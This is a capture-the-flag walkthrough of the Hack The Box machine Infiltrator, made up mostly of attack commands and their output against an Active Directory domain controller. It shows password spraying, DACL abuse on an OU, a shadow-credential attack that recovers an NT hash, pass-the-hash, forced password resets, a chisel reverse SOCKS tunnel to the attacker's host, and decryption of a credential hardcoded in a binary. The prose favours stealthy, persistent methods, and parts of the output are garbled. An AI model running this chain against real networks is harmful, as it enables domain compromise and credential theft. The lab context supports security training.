SMB [Link] 445 DC01 [-] [Link]\winrm_svc:WAT?watismypass!


STATUS_LOGON_FAILURE
SMB [Link] 445 DC01 [-] [Link]\lan_managment:WAT?watismypass!
STATUS_LOGON_FAILURE

SMB [Link] 445 DC01 [-] [Link]\[Link]:MessengerApp@Pass!


STATUS_ACCOUNT_RESTRICTION

SMB [Link] 445 DC01 [-] [Link]\[Link]:MessengerApp@Pass!


STATUS_ACCOUNT_RESTRICTION

SMB [Link] 445 DC01 [-] [Link]\[Link]:MessengerApp@Pass!


STATUS_LOGON_FAILURE

SMB [Link] 445 DC01 [-] [Link]\[Link]:MessengerApp@Pass!


STATUS_LOGON_FAILURE

SMB [Link] 445 DC01 [-] [Link]\[Link]:MessengerApp@Pass!


STATUS_LOGON_FAILURE

SMB [Link] 445 DC01 [-] [Link]\[Link]:MessengerApp@Pass!


STATUS_LOGON_FAILURE

SMB [Link] 445 DC01 [-] [Link]\winrm_svc:MessengerApp@Pass!


STATUS_LOGON_FAILURE

SMB [Link] 445 DC01 [-] [Link]\lan_managment:MessengerApp@Pass!


STATUS_LOGON_FAILURE

Only the account [Link] successfully authenticates. However, for both tested passwords, I observe
that two users—[Link] and [Link]—return a STATUS_ACCOUNT_RESTRICTION response
(indicated by a purple [-] in the output). This status often signifies that the accounts are members of
the Protected Users security group, which enforces stricter authentication policies, including the
disallowance of NTLM authentication.
To work around this, I will attempt authentication again using the -k option, which enables Kerberos
authentication instead of NTLM.

15 July

┌──(root㉿kali)-[/home/anurag/Downloads]

└─# netexec smb [Link] -u valid_usernames.txt -p passwords --continue-on-success -k

SMB [Link] 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01)
(domain:[Link]) (signing:True) (SMBv1:False)

SMB [Link] 445 DC01 [+] [Link]\[Link]:WAT?watismypass!

SMB [Link] 445 DC01 [+] [Link]\[Link]:WAT?watismypass!

SMB [Link] 445 DC01 [-] [Link]\[Link]:WAT?watismypass!


KDC_ERR_PREAUTH_FAILED

SMB [Link] 445 DC01 [-] [Link]\[Link]:WAT?watismypass!


KDC_ERR_PREAUTH_FAILED
SMB [Link] 445 DC01 [-] [Link]\[Link]:WAT?watismypass!
KDC_ERR_PREAUTH_FAILED

SMB [Link] 445 DC01 [-] [Link]\[Link]:WAT?watismypass!


KDC_ERR_PREAUTH_FAILED

SMB [Link] 445 DC01 [-] [Link]\[Link]:WAT?watismypass!


KDC_ERR_PREAUTH_FAILED

SMB [Link] 445 DC01 [-] [Link]\winrm_svc:WAT?watismypass!


KDC_ERR_PREAUTH_FAILED

SMB [Link] 445 DC01 [-] [Link]\lan_managment:WAT?watismypass!


KDC_ERR_PREAUTH_FAILED

SMB [Link] 445 DC01 [-] [Link]\[Link]:MessengerApp@Pass!


KDC_ERR_PREAUTH_FAILED

SMB [Link] 445 DC01 [-] [Link]\[Link]:MessengerApp@Pass!


KDC_ERR_PREAUTH_FAILED

SMB [Link] 445 DC01 [-] [Link]\[Link]:MessengerApp@Pass!


KDC_ERR_PREAUTH_FAILED

SMB [Link] 445 DC01 [-] [Link]\[Link]:MessengerApp@Pass!


KDC_ERR_PREAUTH_FAILED

SMB [Link] 445 DC01 [-] [Link]\[Link]:MessengerApp@Pass!


KDC_ERR_PREAUTH_FAILED

SMB [Link] 445 DC01 [-] [Link]\winrm_svc:MessengerApp@Pass!


KDC_ERR_PREAUTH_FAILED

SMB [Link] 445 DC01 [-] [Link]\lan_managment:MessengerApp@Pass!


KDC_ERR_PREAUTH_FAILED

┌──(root㉿kali)-[/home/anurag/Downloads]

└─# netexec smb [Link] -u [Link] -p 'WAT?watismypass!' -k --shares

SMB [Link] 445 DC01 [15 July] Windows 10 / Server 2019 Build 17763 x64 (name:DC01)
(domain:[Link]) (signing:True) (SMBv1:False)

SMB [Link] 445 DC01 [15 July] [Link]\[Link]:WAT?watismypass!

SMB [Link] 445 DC01 [15 July] Enumerated shares

SMB [Link] 445 DC01 Share Permissions Remark

SMB [Link] 445 DC01 ----- ----------- ------

SMB [Link] 445 DC01 ADMIN$ Remote Admin

SMB [Link] 445 DC01 C$ Default share


SMB [Link] 445 DC01 IPC$ READ Remote IPC

SMB [Link] 445 DC01 NETLOGON READ Logon server share

SMB [Link] 445 DC01 SYSVOL READ Logon server share

Authenticated as [Link]

Background
The account [Link] has GenericAll permissions on the Marketing Digital Organizational Unit
(OU). In Active Directory, an OU is used to group and manage users, computers, and other directory
objects. Administrators can assign rights and policies to all members of an OU collectively,
streamlining access control and policy enforcement.

Abusing GenericAll on an OU
According to DACL Trouble: GenericAll on OUs by Adam Couch, a penetration tester can exploit this
privilege by modifying the OU configuration so that all its members inherit the GenericAll permission
from an account I control. Once I gain GenericAll over a specific user, I can either change their
password or add a shadow credential to gain persistent access.
The BloodHound documentation also describes similar techniques for exploiting GenericAll privileges
on an OU.

HTB-Specific Note
On the Infiltrator HTB machine, this path is reset regularly so that other players cannot retain the
benefit. Therefore, all necessary commands must be executed in rapid succession to succeed. While I
will explain each step, the most practical approach is to prepare a pasteable script that executes all
commands together without delay.

Modifying the OU
The resources mentioned above demonstrate how to use PowerShell to modify an OU’s
Discretionary Access Control List (DACL). However, since I do not yet have PowerShell access on
Infiltrator, I will instead follow the method described by SynActiv, which uses the [Link] tool
from the Impacket suite to perform the DACL modification remotely.

┌──(root㉿kali)-[/home/anurag/Downloads]

└─#[Link] -action write -rights FullControl -inheritance -principal [Link] -target-dn


"OU=MARKETING DIGITAL,DC=INFILTRATOR,DC=HTB" '[Link]/[Link]:WAT?watismypass!'
-dc-ip [Link]

Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[-] unsupported hash type MD4

┌──(root㉿kali)-[/home/anurag/Downloads] KRB5CCNAME=[Link] [Link] -action


write -rights FullControl -inheritance -principal [Link] -target-dn "OU=MARKETING
DIGITAL,DC=INFILTRATOR,DC=HTB" [Link]/[Link] -k -no-pass -dc-ip [Link]

Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] NB: objects with adminCount=1 will no inherit ACEs from their parent container/OU

[*] DACL backed up to [Link]

[*] DACL modified successfully!

┌──(root㉿kali)-[/home/anurag/Downloads]

└─# [Link] -action write -rights FullControl -inheritance -principal [Link] -target-dn
"OU=MARKETING DIGITAL,DC=INFILTRATOR,DC=HTB" '[Link]/[Link]:WAT?watismypass!'
-dc-ip [Link] -k

Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[-] CCache file is not found. Skipping...

[*] NB: objects with adminCount=1 will no inherit ACEs from their parent container/OU
[*] DACL backed up to [Link]

[*] DACL modified successfully!

At this stage, [Link] now has FullControl privileges over all members of the Marketing Digital
OU, including the account [Link].

Shadow Credential Attack


With FullControl privileges, one common approach would be to reset the password of [Link]
and authenticate directly. However, instead of opting for this noisy method, I will take a stealthier
route—adding a shadow credential to the account using Certipy, a technique I previously
demonstrated in the Absolute machine.

A shadow credential is an alternate authentication certificate added to an account’s key material,


allowing me to authenticate as that user without altering their password or triggering obvious
account changes. This method offers two key advantages:

1. Stealth – It leaves minimal traces in common event logs compared to a password reset.

2. Persistence – It bypasses HTB’s cleanup scripts, which often remove simple privilege changes
or password modifications, ensuring my access remains intact even after resets.

┌──(root㉿kali)-[/home/anurag/Downloads]

└─# KRB5CCNAME=[Link] certipy shadow auto -k -target [Link] -account


[Link]

Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Targeting user '[Link]'

[*] Generating certificate

[*] Certificate generated

[*] Generating Key Credential

[*] Key Credential generated with DeviceID '030e3bf6-55fc-8c91-3f30-b52c9b22c7f4'

[*] Adding Key Credential with device ID '030e3bf6-55fc-8c91-3f30-b52c9b22c7f4' to the Key


Credentials for '[Link]'

[*] Successfully added Key Credential with device ID '030e3bf6-55fc-8c91-3f30-b52c9b22c7f4' to the


Key Credentials for '[Link]'

[*] Authenticating as '[Link]' with the certificate

[*] Using principal: [Link]@[Link]

[*] Trying to get TGT...

[*] Got TGT

[*] Saved credential cache to '[Link]'

[*] Trying to retrieve NT hash for '[Link]'


[*] Restoring the old Key Credentials for '[Link]'

[*] Successfully restored the old Key Credentials for '[Link]'

[*] NT hash for '[Link]': b02e97f2fdb5c3d36f77375383449e56

┌──(root㉿kali)-[/home/anurag/Downloads]

└─# KRB5CCNAME=[Link] netexec smb [Link] --use-kcache

SMB [Link] 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64
(name:DC01) (domain:[Link]) (signing:True) (SMBv1:False)

SMB [Link] 445 DC01 [+] [Link]\[Link] from ccache

┌──(root㉿kali)-[/home/anurag/Downloads]

└─# netexec smb [Link] -u [Link] -H b02e97f2fdb5c3d36f77375383449e56

SMB [Link] 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64
(name:DC01) (domain:[Link]) (signing:True) (SMBv1:False)

SMB [Link] 445 DC01 [+]


[Link]\[Link]:b02e97f2fdb5c3d36f77375383449e56

┌──(root㉿kali)-[/home/anurag/Downloads]

└─# bloodyAD -u [Link] -p :b02e97f2fdb5c3d36f77375383449e56 --host [Link] -d


[Link] add groupMember "CHIEFS MARKETING" [Link]

[+] [Link] added to CHIEFS MARKETING

┌──(root㉿kali)-[/home/anurag/Downloads]

└─# KRB5CCNAME=[Link] bloodyAD -u [Link] -k --host [Link] -d


[Link] add groupMember "CHIEFS MARKETING" [Link]

[+] [Link] added to CHIEFS MARKETING

┌──(root㉿kali)-[/home/anurag/Downloads]

└─# netexec smb [Link] -u [Link] -p '0xdf0xdf!'

SMB [Link] 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64
(name:DC01) (domain:[Link]) (signing:True) (SMBv1:False)

SMB [Link] 445 DC01 [-] [Link]\[Link]:0xdf0xdf!


STATUS_ACCOUNT_RESTRICTION

┌──(root㉿kali)-[/home/anurag/Downloads]

└─# netexec winrm [Link] -u [Link] -p '0xdf0xdf!'


WINRM [Link] 5985 DC01 [*] Windows 10 / Server 2019 Build 17763
(name:DC01) (domain:[Link])

WINRM [Link] 5985 DC01 [-] [Link]\[Link]:0xdf0xdf!

┌──(root㉿kali)-[/home/anurag/Downloads]

└─# [Link] [Link]/[Link]@[Link] -althash


:b02e97f2fdb5c3d36f77375383449e56 -reset -dc-ip [Link] -newpass '0xdf0xdf!' -altuser
[Link]

Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Setting the password of [Link]\[Link] as [Link]\[Link]

[*] Connecting to DCE/RPC as [Link]\[Link]

[*] Password was changed successfully.

[!] User no longer has valid AES keys for Kerberos, until they change their password again.

┌──(root㉿kali)-[/home/anurag/Downloads]

└─# netexec smb [Link] -u [Link] -p '0xdf0xdf!' -k

SMB [Link] 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64
(name:DC01) (domain:[Link]) (signing:True) (SMBv1:False)

SMB [Link] 445 DC01 [-] [Link]\[Link]:0xdf0xdf!


KDC_ERR_ETYPE_NOSUPP

┌──(root㉿kali)-[/home/anurag/Downloads]

└─# [Link] '[Link]/[Link]:0xdf0xdf!'

Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

Kerberos SessionError: KDC_ERR_ETYPE_NOSUPP(KDC has no support for encryption type)

┌──(root㉿kali)-[/home/anurag/Downloads]

└─# [Link] [Link]/[Link]@[Link] -althash


:b02e97f2fdb5c3d36f77375383449e56 -reset -dc-ip [Link] -newpass '0xdf0xdf!' -altuser
[Link] -p ldap

Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies


[*] Setting the password of [Link]\[Link] as [Link]\[Link]

[*] Password was changed successfully for CN=[Link],CN=Users,DC=infiltrator,DC=htb

┌──(root㉿kali)-[/home/anurag/Downloads]

└─# [Link] '[Link]/[Link]:0xdf0xdf!'

Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Saving ticket in [Link]

┌──(root㉿kali)-[/home/anurag/Downloads]

└─# KRB5CCNAME=[Link] anurag-winrm -i [Link] -r [Link]

Anurag-WinRM shell v3.5

Info: Establishing connection to remote endpoint


*Anurag-WinRM* PS C:\Users\[Link]\Documents>

*Anurag-WinRM* PS C:\Users\[Link]\desktop> type [Link]


YOU WILL GET THE USER FLAG IN [Link]

*anurag-WinRM* PS C:\Users> ls

Directory: C:\Users

Mode LastWriteTime Length Name

---- ------------- ------ ----

d----- 2/20/2024 3:06 AM Administrator

d----- 8/2/2024 4:51 PM [Link]

d----- 2/19/2024 5:45 PM [Link]

d-r--- 12/4/2023 9:22 AM Public

d----- 2/25/2024 7:25 AM winrm_svc


*anurag-WinRM* PS C:\> whoami /priv

PRIVILEGES INFORMATION

----------------------

Privilege Name Description State

============================= ============================== =======

SeMachineAccountPrivilege Add workstations to domain Enabled

SeChangeNotifyPrivilege Bypass traverse checking Enabled

SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

┌──(root㉿kali)-[/home/anurag/Downloads]

└─# *Anurag-WinRM* PS C:\Program Files> ls

Directory: C:\Program Files

Mode LastWriteTime Length Name

---- ------------- ------ ----

d----- 7/15/2023 9:22 AM Common Files

d----- 7/15/2024 1:50 PM Hyper-V

d----- 7/15/2024 3:52 AM internet explorer

d----- 7/15/2024 5:06 AM Output Messenger

d----- 7/15/2024 12:19 PM Output Messenger Server

d----- 7/15/2023 10:04 AM PackageManagement

d----- 7/15/2024 4:16 AM Update Services

d----- 7/15/2023 9:23 AM VMware

d-r--- 7/15/2022 12:03 PM Windows Defender

d----- 7/15/2024 1:50 PM Windows Defender Advanced Threat Protection

d----- 7/15/2022 12:03 PM Windows Mail

d----- 7/15/2024 1:50 PM Windows Media Player

d----- 7/15/2018 12:19 AM Windows Multimedia Platform

d----- 7/15/2018 12:28 AM windows nt


d----- 7/15/2022 12:03 PM Windows Photo Viewer

d----- 7/15/2018 12:19 AM Windows Portable Devices

d----- 7/15/2018 12:19 AM Windows Security

d----- 7/15/2023 10:04 AM WindowsPowerShell

*anurag WinRM* PS C:\> netstat -ano

Active Connections

Proto Local Address Foreign Address State PID

TCP [Link]:80 [Link]:0 LISTENING 4

TCP [Link]:88 [Link]:0 LISTENING 636

TCP [Link]:135 [Link]:0 LISTENING 896

TCP [Link]:389 [Link]:0 LISTENING 636

TCP [Link]:445 [Link]:0 LISTENING 4

TCP [Link]:464 [Link]:0 LISTENING 636

TCP [Link]:593 [Link]:0 LISTENING 896

TCP [Link]:636 [Link]:0 LISTENING 636

TCP [Link]:3268 [Link]:0 LISTENING 636

TCP [Link]:3269 [Link]:0 LISTENING 636

TCP [Link]:3389 [Link]:0 LISTENING 240

TCP [Link]:5985 [Link]:0 LISTENING 4

TCP [Link]:9389 [Link]:0 LISTENING 2640

TCP [Link]:14118 [Link]:0 LISTENING 7240

TCP [Link]:14119 [Link]:0 LISTENING 7240

TCP [Link]:14121 [Link]:0 LISTENING 7240

TCP [Link]:14122 [Link]:0 LISTENING 7240

TCP [Link]:14123 [Link]:0 LISTENING 4

TCP [Link]:14125 [Link]:0 LISTENING 4

TCP [Link]:14126 [Link]:0 LISTENING 3376

TCP [Link]:14127 [Link]:0 LISTENING 7240

TCP [Link]:14128 [Link]:0 LISTENING 7240


TCP [Link]:14130 [Link]:0 LISTENING 7240

TCP [Link]:14406 [Link]:0 LISTENING 3868

TCP [Link]:47001 [Link]:0 LISTENING 4

TCP [Link]:49664 [Link]:0 LISTENING 476

TCP [Link]:49665 [Link]:0 LISTENING 1224

TCP [Link]:49666 [Link]:0 LISTENING 1676

TCP [Link]:49667 [Link]:0 LISTENING 636

TCP [Link]:49669 [Link]:0 LISTENING 2184

TCP [Link]:49690 [Link]:0 LISTENING 636

TCP [Link]:49691 [Link]:0 LISTENING 636

TCP [Link]:49694 [Link]:0 LISTENING 636

TCP [Link]:49707 [Link]:0 LISTENING 616

TCP [Link]:49721 [Link]:0 LISTENING 2116

TCP [Link]:49747 [Link]:0 LISTENING 2092

TCP [Link]:49841 [Link]:0 LISTENING 2772

TCP [Link]:53 [Link]:0 LISTENING 2116

TCP [Link]:139 [Link]:0 LISTENING 4

...[snip]...

TCP [Link]:15220 [Link]:0 LISTENING 7008

TCP [Link]:15230 [Link]:0 LISTENING 7352

...[snip]...

TCP [Link]:53 [Link]:0 LISTENING 2116

...[snip]...

TCP [::]:80 [::]:0 LISTENING 4

TCP [::]:88 [::]:0 LISTENING 636

TCP [::]:135 [::]:0 LISTENING 896

TCP [::]:445 [::]:0 LISTENING 4

TCP [::]:464 [::]:0 LISTENING 636

TCP [::]:593 [::]:0 LISTENING 896

TCP [::]:3389 [::]:0 LISTENING 240

TCP [::]:5985 [::]:0 LISTENING 4


TCP [::]:9389 [::]:0 LISTENING 2640

TCP [::]:14118 [::]:0 LISTENING 7240

TCP [::]:14122 [::]:0 LISTENING 7240

TCP [::]:14123 [::]:0 LISTENING 4

TCP [::]:14125 [::]:0 LISTENING 4

TCP [::]:14126 [::]:0 LISTENING 3376

TCP [::]:14127 [::]:0 LISTENING 7240

TCP [::]:14128 [::]:0 LISTENING 7240

TCP [::]:14130 [::]:0 LISTENING 7240

TCP [::]:14406 [::]:0 LISTENING 3868

TCP [::]:47001 [::]:0 LISTENING 4

TCP [::]:49664 [::]:0 LISTENING 476

TCP [::]:49665 [::]:0 LISTENING 1224

TCP [::]:49666 [::]:0 LISTENING 1676

TCP [::]:49667 [::]:0 LISTENING 636

TCP [::]:49669 [::]:0 LISTENING 2184

TCP [::]:49690 [::]:0 LISTENING 636

TCP [::]:49691 [::]:0 LISTENING 636

TCP [::]:49694 [::]:0 LISTENING 636

TCP [::]:49707 [::]:0 LISTENING 616

TCP [::]:49721 [::]:0 LISTENING 2116

TCP [::]:49747 [::]:0 LISTENING 2092

TCP [::]:49841 [::]:0 LISTENING 2772

TCP [::1]:53 [::]:0 LISTENING 2116

...[snip]...

TCP [::1]:51420 [::1]:49667 TIME_WAIT 0

TCP [::1]:51428 [::1]:9389 TIME_WAIT 0

...[snip]...

*anurag-WinRM* PS C:\> $nets = netstat -ano | select-string LISTENING

foreach($n in $nets){

# make split easier PLUS make it a string instead of a match object:


$p = $n -replace ' +',' '

# make it an array:

$nar = $[Link](' ')

# pick last item:

$pname = $(Get-Process -id $nar[-1]).ProcessName

$ppath = $(Get-Process -id $nar[-1]).Path

# print the modified line with processname instead of PID:

$n -replace "$($nar[-1])","$($ppath) $($pname)"

TCP [Link]:80 [Link]:0 LISTENING System

TCP [Link]:88 [Link]:0 LISTENING lsass

TCP [Link]:135 [Link]:0 LISTENING svchost

TCP [Link]:389 [Link]:0 LISTENING lsass

TCP [Link]: System System5 [Link]:0 LISTENING System

TCP [Link]:464 [Link]:0 LISTENING lsass

TCP [Link]:593 [Link]:0 LISTENING svchost

TCP [Link]: lsass [Link]:0 LISTENING lsass

TCP [Link]:3268 [Link]:0 LISTENING lsass

TCP [Link]:3269 [Link]:0 LISTENING lsass

TCP [Link]:3389 [Link]:0 LISTENING svchost

TCP [Link]:5985 [Link]:0 LISTENING System

TCP [Link]:9389 [Link]:0 LISTENING [Link]

TCP [Link]:14118 [Link]:0 LISTENING OMServerService

TCP [Link]:14119 [Link]:0 LISTENING OMServerService

TCP [Link]:14121 [Link]:0 LISTENING OMServerService

TCP [Link]:14122 [Link]:0 LISTENING OMServerService

TCP [Link]:1 System123 [Link]:0 LISTENING System

TCP [Link]:1 System125 [Link]:0 LISTENING System

TCP [Link]:14126 [Link]:0 LISTENING outputmessenger_httpd

TCP [Link]:14127 [Link]:0 LISTENING OMServerService

TCP [Link]:14128 [Link]:0 LISTENING OMServerService


TCP [Link]:14130 [Link]:0 LISTENING OMServerService

TCP [Link]:14406 [Link]:0 LISTENING outputmessenger_mysqld

TCP [Link]:15223 [Link]:0 LISTENING OutputMessenger

TCP [Link]: System7001 [Link]:0 LISTENING System

TCP [Link]:49664 [Link]:0 LISTENING wininit

TCP [Link]:49665 [Link]:0 LISTENING svchost

TCP [Link]:49666 [Link]:0 LISTENING svchost

TCP [Link]:49667 [Link]:0 LISTENING lsass

TCP [Link]:49669 [Link]:0 LISTENING svchost

TCP [Link]:49682 [Link]:0 LISTENING lsass

TCP [Link]:49683 [Link]:0 LISTENING lsass

TCP [Link]:49686 [Link]:0 LISTENING lsass

TCP [Link]:49701 [Link]:0 LISTENING services

TCP [Link]:49714 [Link]:0 LISTENING dns

TCP [Link]:49739 [Link]:0 LISTENING certsrv

TCP [Link]:49892 [Link]:0 LISTENING dfsrs

TCP [Link]:53 [Link]:0 LISTENING dns

TCP [Link]:139 [Link]:0 LISTENING System

TCP [Link]:15220 [Link]:0 LISTENING OutputMessenger

TCP [Link]:15230 [Link]:0 LISTENING OutputMessenger

TCP [Link]:53 [Link]:0 LISTENING dns

TCP [::]:80 [::]:0 LISTENING System

TCP [::]:88 [::]:0 LISTENING lsass

TCP [::]:135 [::]:0 LISTENING svchost

TCP [::]: System System5 [::]:0 LISTENING System

TCP [::]:464 [::]:0 LISTENING lsass

TCP [::]:593 [::]:0 LISTENING svchost

TCP [::]:3389 [::]:0 LISTENING svchost

TCP [::]:5985 [::]:0 LISTENING System

TCP [::]:9389 [::]:0 LISTENING [Link]

TCP [::]:14118 [::]:0 LISTENING OMServerService


TCP [::]:14122 [::]:0 LISTENING OMServerService

TCP [::]:1 System123 [::]:0 LISTENING System

TCP [::]:1 System125 [::]:0 LISTENING System

TCP [::]:14126 [::]:0 LISTENING outputmessenger_httpd

TCP [::]:14127 [::]:0 LISTENING OMServerService

TCP [::]:14128 [::]:0 LISTENING OMServerService

TCP [::]:14130 [::]:0 LISTENING OMServerService

TCP [::]:14406 [::]:0 LISTENING outputmessenger_mysqld

TCP [::]:15223 [::]:0 LISTENING OutputMessenger

TCP [::]: System7001 [::]:0 LISTENING System

TCP [::]:49664 [::]:0 LISTENING wininit

TCP [::]:49665 [::]:0 LISTENING svchost

TCP [::]:49666 [::]:0 LISTENING svchost

TCP [::]:49667 [::]:0 LISTENING lsass

TCP [::]:49669 [::]:0 LISTENING svchost

TCP [::]:49682 [::]:0 LISTENING lsass

TCP [::]:49683 [::]:0 LISTENING lsass

TCP [::]:49686 [::]:0 LISTENING lsass

TCP [::]:49701 [::]:0 LISTENING services

TCP [::]:49714 [::]:0 LISTENING dns

TCP [::]:49739 [::]:0 LISTENING certsrv

TCP [::]:49892 [::]:0 LISTENING dfsrs

TCP [::1]:53 [::]:0 LISTENING dns

*anurag-WinRM* PS C:\programdata> .\[Link] client [Link]:8000 R:1080:socks

[Link] : 2024/09/06 13:30:16 client: Connecting to [Link]

2024/09/06 13:30:16 client: Connected (Latency 16.1869ms)


Output Wall

Researching Output Wall, it’s a plugin to the chat application designed for interoffice communication.
I’ll download the Output messenger application from here and install it on my Linux VM.

I’ll start it with proxychains outputmessenger, and it offers a login screen I’ll enter [Link] and their
creds, with the server as [Link] (using proxychains to get to Infiltrator):
┌──(root㉿kali)-[/home/anurag/Downloads]

└─# netexec smb [Link] -u [Link] -p 'D3v3l0p3r_Pass@1337!' -k

SMB [Link] 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64
(name:DC01) (domain:[Link]) (signing:True) (SMBv1:False)

SMB [Link] 445 DC01 [+] [Link]\[Link]:D3v3l0p3r_Pass@1337!

┌──(root㉿kali)-[/home/anurag/Downloads]

└─#file [Link]

[Link]: PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows, 3
sections

┌──(root㉿kali)-[/home/anurag/Downloads]

└─#PS Z:\hackthebox\infiltrator-[Link] > .\[Link]

Usage: [Link] -u <username> -p <password> -s <searchedUsername> [-default]

To use the default credentials: [Link] -default -s userToSearch


┌──(root㉿kali)-[/home/anurag/Downloads]

└─#PS Z:\hackthebox\infiltrator-[Link] > .\[Link] -u harris -p test -s test

Attempting Service Connection...

Service Connection Successful.

Search for test user...

An error occurred: The server is not operational.

PS Z:\hackthebox\infiltrator-[Link] > .\[Link] -s test -default

Attempting Service Connection...

Service Connection Successful.

Search for test user...

internal class LdapApp

private static void Main(string[] args)

string path = "LDAP://[Link]";

string username = "";

string password = "";


string str1 = "";

string str2 = "winrm_svc";

string cipherText = "TGlu22oo8GIHRkJBBpZ1nQ/x6l36MVj3Ukv4Hw86qGE=";

for (int index = 0; index < [Link]; index += 2)

switch (args[index].ToLower())

case "-u":

username = args[index + 1];

break;

case "-p":

password = args[index + 1];

break;

case "-s":

str1 = args[index + 1];

break;

case "-default":

username = str2;

password = [Link]("b14ca5898a4e4133bbce2ea2315a1916", cipherText);

break;

default:

[Link]([Link]("Invalid argument: {0}", (object) args[index]));

return;

if (![Link](username) && ![Link](password))

if (![Link](str1))

{
try

[Link]("Attempting Service Connection...");

using (DirectoryEntry searchRoot = new DirectoryEntry(path, username, password))

[Link]("Service Connection Successful.");

using (DirectorySearcher directorySearcher = new DirectorySearcher(searchRoot))

[Link] = [Link]("(SAMAccountName={0})", (object) str1);

[Link]([Link]("Search for {0} user...", (object) str1));

SearchResult one = [Link]();

if (one != null)

[Link]("User found. Details:");

DirectoryEntry directoryEntry = [Link]();

[Link]([Link]("Name: {0}", [Link]["cn"].Value));

[Link]([Link]("EmailID: {0}", [Link]["mail"].Value));

[Link]([Link]("Telephone Extension: {0}",


[Link]["telephoneNumber"].Value));

[Link]([Link]("Department: {0}",
[Link]["department"].Value));

[Link]([Link]("Job Title: {0}", [Link]["title"].Value));

return;

[Link]("User not found.");

return;

catch (Exception ex)

[Link]([Link]("An error occurred: {0}", (object) [Link]));


return;

[Link]("Usage: [Link] -u <username> -p <password> -s


<searchedUsername> [-default]");

[Link]("To use the default credentials: [Link] -default -s userToSearch");

public class Decryptor

public static string DecryptString(string key, string cipherText)

using (Aes aes = [Link]())

[Link] = [Link](key);

[Link] = new byte[16];

ICryptoTransform decryptor = [Link]([Link], [Link]);

using (MemoryStream memoryStream = new


MemoryStream(Convert.FromBase64String(cipherText)))

using (CryptoStream cryptoStream = new CryptoStream((Stream) memoryStream, decryptor,


[Link]))

using (StreamReader streamReader = new StreamReader((Stream) cryptoStream))

return [Link]();

}
┌──(root㉿kali)-[/home/anurag/Downloads]

└─# netexec smb [Link] -u winrm_svc -p 'WinRm@$svc^!^P'

SMB [Link] 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64
(name:DC01) (domain:[Link]) (signing:True) (SMBv1:False)

SMB [Link] 445 DC01 [+] [Link]\winrm_svc:WinRm@$svc^!^P

┌──(root㉿kali)-[/home/anurag/Downloads]

└─#netexec winrm [Link] -u winrm_svc -p 'WinRm@$svc^!^P'

WINRM [Link] 5985 DC01 [*] Windows 10 / Server 2019 Build 17763
(name:DC01) (domain:[Link])

WINRM [Link] 5985 DC01 [+] [Link]\winrm_svc:WinRm@$svc^!^P


(Pwn3d!)

┌──(root㉿kali)-[/home/anurag/Downloads] anurag-winrm -i [Link] -u winrm_svc -p


'WinRm@$svc^!^P'

Anurag-WinRM shell v3.5


Info: Establishing connection to remote endpoint

*Anurag-WinRM* PS C:\Users\winrm_svc\Documents>

*Anurag-WinRM* PS C:\Users\winrm_svc> whoami /groups

GROUP INFORMATION

-----------------

Group Name Type SID Attributes

=========================================== ================
==============================================
==================================================

Everyone Well-known group S-1-1-0 Mandatory group,


Enabled by default, Enabled group

BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory


group, Enabled by default, Enabled group

BUILTIN\Users Alias S-1-5-32-545 Mandatory group,


Enabled by default, Enabled group

BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554


Mandatory group, Enabled by default, Enabled group

BUILTIN\Certificate Service DCOM Access Alias S-1-5-32-574 Mandatory


group, Enabled by default, Enabled group

NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory


group, Enabled by default, Enabled group

NT AUTHORITY\Authenticated Users Well-known group S-1-5-11


Mandatory group, Enabled by default, Enabled group

NT AUTHORITY\This Organization Well-known group S-1-5-15


Mandatory group, Enabled by default, Enabled group

INFILTRATOR\Service_Management Group S-1-5-21-2606098828-3734741516-


3625406802-1116 Mandatory group, Enabled by default, Enabled group

NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10


Mandatory group, Enabled by default, Enabled group

Mandatory Label\Medium Plus Mandatory Level Label S-1-16-8448


*Anurag-WinRM* PS C:\Users\winrm_svc\AppData\Roaming\Output Messenger> ls

Directory: C:\Users\winrm_svc\AppData\Roaming\Output Messenger

Mode LastWriteTime Length Name

---- ------------- ------ ----

d----- 2/25/2024 7:20 AM JAAA

-a---- 2/25/2024 7:20 AM 948 [Link]

*Anurag-WinRM* PS C:\Users\winrm_svc\AppData\Roaming\Output Messenger> tree /f

Folder PATH listing

Volume serial number is 96C7-B603

C:.

³ [Link]

ÀÄÄÄJAAA

³ OM.db3

³ OT.db3

ÃÄÄÄAudios

ÃÄÄÄCalendarFiles

ÃÄÄÄLog

ÃÄÄÄMailInbox

ÃÄÄÄMailSent

ÃÄÄÄReceived Files

ÃÄÄÄScreenshots

ÃÄÄÄTemp

³ ³ arrow_l_active.png

³ ³ arrow_l_active_d.png

³ ³ arrow_l_alert.png

³ ³ arrow_l_inactive.png
³ ³ arrow_l_inactive_d.png

³ ³ arrow_r_active.png

³ ³ arrow_r_active_d.png

³ ³ arrow_r_alert.png

³ ³ arrow_r_inactive.png

³ ³ arrow_r_inactive_d.png

³ ³ cat0_mini.png

³ ³ cat1_mini.png

³ ³ cat2_mini.png

³ ³ cat3_mini.png

³ ³ cat4_mini.png

³ ³ [Link]

³ ³ [Link]

³ ³ c_anno.png

³ ³ [Link]

³ ³ [Link]

³ ³ forward_icon_b_15.png

³ ³ forward_icon_w_15.png

³ ³ leave_today_16.png

³ ³ leave_tomorrow3_16.png

³ ³ load_20.gif

³ ³ [Link]

³ ³ message_notification.gif

³ ³ [Link]

³ ³ mobile_offline2.png

³ ³ network10_16.png

³ ³ network11_16.png

³ ³ network12_16.png

